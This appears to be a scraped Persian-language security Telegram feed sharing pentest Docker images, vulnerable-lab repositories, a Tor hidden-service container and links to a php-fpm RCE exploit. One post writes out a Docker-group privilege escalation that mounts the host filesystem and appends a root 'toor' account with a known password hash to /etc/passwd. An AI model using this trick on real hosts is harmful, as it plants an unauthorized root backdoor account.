اجرای لینوکس بک باکس در مرورگر به کمک داکر
https://www.homelab.it/index.php/2016/06/25/backbox4browser-backbox-browser/
#docker
#linux
#browser
#virtualization
https://www.homelab.it/index.php/2016/06/25/backbox4browser-backbox-browser/
#docker
#linux
#browser
#virtualization
HomeLab IT
BackBox4Browser: BackBox in a Browser - HomeLab IT
BackBox4Browser: Tutta la potenza della distribuzione BackBox 4 racchiusa in un container docker gestibile comodamente da browser.
داکرهای مختلف برای انجام عملیات تست نفوذ شامل :
tulpar
nmap / NSE / Vulscan / Vulners
sqlmap
dcrawl
v3n0m
golismero
sqliv
datasploit
gitminer
Cr3dOv3r
UFONet
Striker
EmailHarvester
BruteX
BlackWidow
https://github.com/khast3x/Offensive-Dockerfiles
#docker
#nmap
#sqlmap
#pentest
@sec_nerd
tulpar
nmap / NSE / Vulscan / Vulners
sqlmap
dcrawl
v3n0m
golismero
sqliv
datasploit
gitminer
Cr3dOv3r
UFONet
Striker
EmailHarvester
BruteX
BlackWidow
https://github.com/khast3x/Offensive-Dockerfiles
#docker
#nmap
#sqlmap
#pentest
@sec_nerd
GitHub
GitHub - khast3x/Offensive-Dockerfiles: Offensive tools as Dockerfiles. Lightweight & Ready to go
Offensive tools as Dockerfiles. Lightweight & Ready to go - GitHub - khast3x/Offensive-Dockerfiles: Offensive tools as Dockerfiles. Lightweight & Ready to go
داکر مفیدی که به شما کمک میکند بجای جستجو در وب سایتهای مختلف برای بررسی مشخصات یک فایل مشکوک (ویروس یا بدافزار بودن فایل) و اطمینان از پاک بودن یا آلودگی آن ، به راحتی هش فایل مورد نظر را در این داکر که بر روی پورت 5000 به شما سرویس میدهد، جستجو کرده و نتایج را ببینید:
https://github.com/PaulSec/metasearch-public
#virustotal
#malware
#virus
#docker
@sec_nerd
https://github.com/PaulSec/metasearch-public
#virustotal
#malware
#virus
#docker
@sec_nerd
GitHub
PaulSec/metasearch-public
Stop searching for sample hashes on 10 different sites. - PaulSec/metasearch-public
مجموعه داکرها برای انجام تست نفوذ، حاوی ابزارهای متفاوت برای راحتی بیشتر
https://github.com/ZephrFish/DockerAttack
#docker
#pentest
#linux
@sec_nerd
https://github.com/ZephrFish/DockerAttack
#docker
#pentest
#linux
@sec_nerd
GitHub
GitHub - ZephrFish/DockerAttack: Various Tools and Docker Images
Various Tools and Docker Images. Contribute to ZephrFish/DockerAttack development by creating an account on GitHub.
مجموع داکرهای متعدد برای پیاده سازی و آزمایش آسیپ پذیریهای مختلف
https://github.com/vulhub/vulhub
#docker
#lab
#pentest
@sec_nerd
https://github.com/vulhub/vulhub
#docker
#lab
#pentest
@sec_nerd
GitHub
GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose
Pre-Built Vulnerable Environments Based on Docker-Compose - vulhub/vulhub
اگر به یک سیستم لینوکسی دسترسی دارید و id کاربر شما نشان میدهد که شما عضو گروه docker نیز هستید، میتوانید با دستورات زیر سطح دسترسی خود را در کانتینرها به روت افزایش دهید:
$> docker run -it --rm -v $PWD:/mnt bash
دستور زیر حسابی با نام کاربری toor و پسورد password اضافه خواهد کرد:
#> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
#docker
#linux
#privesc
#trick
@sec_nerd
$> docker run -it --rm -v $PWD:/mnt bash
دستور زیر حسابی با نام کاربری toor و پسورد password اضافه خواهد کرد:
#> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
#docker
#linux
#privesc
#trick
@sec_nerd
ایجاد و اجرای سرویس های مخفی onion با استفاده از داکر
(وب سرور nginx)
https://github.com/opsxcq/docker-tor-hiddenservice-nginx
#tor
#onion
#docker
@sec_nerd
(وب سرور nginx)
https://github.com/opsxcq/docker-tor-hiddenservice-nginx
#tor
#onion
#docker
@sec_nerd
GitHub
GitHub - opsxcq/docker-tor-hiddenservice-nginx: Easily setup a hidden service inside the Tor network
Easily setup a hidden service inside the Tor network - opsxcq/docker-tor-hiddenservice-nginx
بروت فورس پارامترهای GET و POST در صفحات وب با ParamPamPam
https://github.com/Bo0oM/ParamPamPam
#web
#pentest
#bruteforce
#docker
@sec_nerd
https://github.com/Bo0oM/ParamPamPam
#web
#pentest
#bruteforce
#docker
@sec_nerd
GitHub
GitHub - Bo0oM/ParamPamPam
Contribute to Bo0oM/ParamPamPam development by creating an account on GitHub.
امنیت اطلاعات
آسیب پذیری جدیدی از نوع RCE در php-fpm کشف شده است https://bugs.php.net/bug.php?id=78599 و با وجود پچ شدن آن به تازگی، سرور های آسیب پذیر فراوانی با ترکیب nginx و php یافت میشوند اکسپلویت: https://github.com/neex/phuip-fpizdam #php #nginx #rce @sec_nerd
داکر مخصوص آسیب پذیری php-fpm و nginx برای آزمایش آسیب پذیری RCE با شناسه CVE-2019-11043
https://github.com/akamajoris/CVE-2019-11043-Docker
#php
#nginx
#rce
#docker
@sec_nerd
https://github.com/akamajoris/CVE-2019-11043-Docker
#php
#nginx
#rce
#docker
@sec_nerd
GitHub
GitHub - akamajoris/CVE-2019-11043-Docker
Contribute to akamajoris/CVE-2019-11043-Docker development by creating an account on GitHub.